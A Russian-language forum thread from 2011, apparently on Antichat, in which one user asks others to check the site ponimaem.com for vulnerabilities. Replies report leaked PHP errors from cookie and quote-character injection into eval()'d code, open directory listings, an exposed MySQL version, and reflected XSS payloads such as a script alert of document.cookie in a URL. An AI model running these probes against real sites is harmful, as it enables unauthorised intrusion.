Проверка на уязвимости сайта

Обсуждение в разделе «Проверка на уязвимости», начал(-а) zx_su, 22.01.2011.

  1. zx_su

    zx_su New Member

    Регистрация:
    20.01.2011
    Сообщения:
    1
    Одобрения:
    0
    Репутация:
    0
    Добрый день.
    Прошу проверить сайт ponimaem.com на наличие дырок.
    Буду очень благодарен.
    Прошу прошения, если тему создал не там.
     
  2. ~d0s~

    ~d0s~ Banned

    Регистрация:
    17.04.2010
    Сообщения:
    265
    Одобрения:
    256
    Репутация:
    154
    Добавляем спец.символы в куки,видим:
    Code:
    Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
    
    Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
    
    Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
     
  3. BigBear

    BigBear Well-Known Member
    Гарант - Escrow Service

    Регистрация:
    4.12.2008
    Сообщения:
    1 645
    Одобрения:
    666
    Репутация:
    833
    Также есть возможность погулять по папкам

    Code:
    http://ponimaem.com/includes/
    
    http://ponimaem.com/images/
    
    
    При попытке постучаться на 3306 порт выплюнуло версию мускула

    5.0.91-community
     
    _________________________
    #3 BigBear, 24.01.2011
    В последний раз редактировалось: 24.01.2011
  4. CheatCodeX

    CheatCodeX New Member

    Регистрация:
    12.01.2011
    Сообщения:
    2
    Одобрения:
    0
    Репутация:
    0
    Подставляем ' в поле пароля видим
    Code:
    Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1
     
  5. randman

    randman Members of Antichat

    Регистрация:
    15.05.2010
    Сообщения:
    1 372
    Одобрения:
    604
    Репутация:
    1 101
    В гостевую требуется капча :)
     
  6. Ruslan1817

    Ruslan1817 Active Member

    Регистрация:
    17.01.2009
    Сообщения:
    103
    Одобрения:
    256
    Репутация:
    146
    Code:
    http://ponimaem.com/gb/index.php?pg=&t="><script>alert(document.cookie)</script>
    какой балбес Acunetix запускал ? )) Вы хоть руками тоже смотрите.
     
    Это одобряет 1 пользователь.
  7. Gedj

    Gedj Elder - Старейшина

    Регистрация:
    15.09.2008
    Сообщения:
    92
    Одобрения:
    30
    Репутация:
    2
    Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1

    Нажимаем регистрация в поле вставляем '
     
  8. kravch_v

    kravch_v Member

    Регистрация:
    1.09.2011
    Сообщения:
    147
    Одобрения:
    43
    Репутация:
    1
    XSS
    http://ponimaem.com/test.php

    Форма:
    Code:
    <script>alert('xss')</script>
     
Загрузка...